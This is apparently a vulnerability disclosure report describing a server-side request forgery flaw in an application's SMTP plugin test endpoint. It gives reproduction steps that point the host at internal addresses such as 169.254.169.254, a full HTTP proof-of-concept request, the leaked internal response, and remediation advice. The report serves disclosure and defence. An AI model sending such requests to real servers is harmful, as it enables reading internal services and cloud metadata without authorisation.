Description

The SMTP plugin doesn't have verification or validation, allowing the attacker to make requests to internal servers and get the contents.

Reproduce

1. Go to Team & Settings
2. App Store > SMTP
3. Configure and intercept Test request
4. Change Host/Port to internal address, example: 169.254.169.254, 192.168.0.1, 127.0.0.1
5. You receive the contents of the connection.

Proof of Concept

POST /api/v1/db/meta/plugins/test HTTP/1.1
Host: 192.168.15.50:8080
Content-Length: 129
Accept: application/json, text/plain, */*
xc-gui: true
xc-auth: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Content-Type: application/json
Origin: http://192.168.15.50:8080
Referer: http://192.168.15.50:8080/dashboard/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: refresh_token=
Connection: close

{"input":{"from":"","host":"192.168.15.41","port":"1337","secure":""},"id":"nc_rb4gaggzddwut5","category":"Email","title":"SMTP"}

Response

{"msg":"Invalid greeting. response=[INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE: [INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE"}

Video Demo

https://drive.google.com/file/d/1hCJ8nXpssBRq7sV8JN73oXupN_zPWN-T/view?usp=sharing

Remediation

• Implement a validation and filtering of data received by the user.
• Use a allow-list with the necessary IPs for the application.
• User does not receive the connection content.

Impact

SSRF to internal addresses, attacker can make a request as the server and read it's contents, this can lead to leak of sensitive information.